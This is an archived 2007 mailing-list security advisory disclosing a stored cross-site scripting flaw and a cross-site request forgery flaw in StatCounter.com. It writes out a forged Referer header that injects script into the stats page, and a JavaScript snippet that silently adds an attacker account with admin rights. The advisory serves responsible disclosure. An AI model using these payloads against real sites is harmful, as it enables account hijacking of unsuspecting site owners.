| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 23 Jul 2007 15:52:44 +0200
From: Matteo Carli <matteo@...teocarli.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: STATCOUNTER.COM: Cross-Site Scripting and
Cross-Site Request Forgery
1. DESCRIPTION OF THE SOFTWARE
StatCounter.com is a free yet reliable invisible web tracker, highly
configurable hit counter as well as a real-time detailed web stats tool.
Insert a simple piece of our code on your web page or blog and you will
be able to analyse and monitor all the visitors to your website in
real-time! [from statcounter.com]
2. DESCRIPTION OF THE VULNERABILITY
The referrer field is taken from the HTTP header generated by the user
with his browser. So it's a user-input and it is therefore possibile to
tamper with it.
This is a snip of the code taken from the section "Came From" of the
statistics page on statcounter.com
...
<img src="http://www.statcounter.com/images/drill_down.gif" alt="drill
down" border="0"></a></td><td class="tableContent1Right">1</td><td
class="tableContent1Left"><a
href="http://www.google.it/?q=stat+counter"
target="_blank">www.google.it/?q=stat+counter</a></td></tr>
...
If an attacker creates an HTTP request with this header, an alert box
will be displayed when the blogger reads his stats:
Referer:http://www.domain.it"></a><script>alert("XSS")</script><a href="
On the stats page this HTML code will be written:
...
<img src="http://www.statcounter.com/images/drill_down.gif" alt="drill
down" border="0"></a></td><td class="tableContent1Right">1</td><td
class="tableContent1Left"><a
href="http://www.domain.it"></a><script>alert("XSS")</script><a href=""
target="_blank">http://www.domain.it"></a><script>alert("XSS")</script><a
href="</a></td></tr>
...
3. ANALYSIS
An attacker could forge the HTTP Referrer so to inject inside it some
Javascript code aiming to create a persistent Cross-Site Scripting (XSS).
In order to exploit this vulnerability, an attacker can simply request a
page controlled by the StatCounter script and send a specially crafted
HTTP header.
Besides the XSS bug, there is also another one: in the "user" page on
the personal account area it is possbile to add a new user to the
statistics page. The page that receives the parameters (/user/add.php)
does not use any validation code for preventing CSRF (Cross-Site Request
Forgery).
So, in this case, is it possible to create a CSRF with a simple piece of
JS code injected into the referer HTTP header like this:
<SCRIPT>
var img = new Image();
img.src =
'http://'+document.domain+'/users/add.php?postback=1&username=MyUserName&etc...';
//this is not all parameters needed
</SCRIPT>
Note that the original form method is POST but the PHP page retrieves
the parameter with a $_REQUEST method and the"document.domain" is
necessary because Stat Counter uses a different Web server for load
balancing.
In this way an attacker can, silently, add himself/herself, with
administrative privileges, to statistics panel of a compromised account
and he/she can execute some JavaScript code.
No user interaction is needed.
4. IMPACT
The impact of this vulnerability is HIGH for integrity of Stat Counter
customer account.
5. TIME LINE
05/07/2007 - Vendor contacted
16/07/2007 - Vendor solved XSS bug
17/07/2007 - Vendor working on CSRF bug
23/07/2007 - PUBLIC DISCLOSURE
--
Matteo Carli
matteo@...teocarli.com | web: www.matteocarli.com
GPG keyID: 0xD20BA70A | GnuPG key server: pgp.mit.edu
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists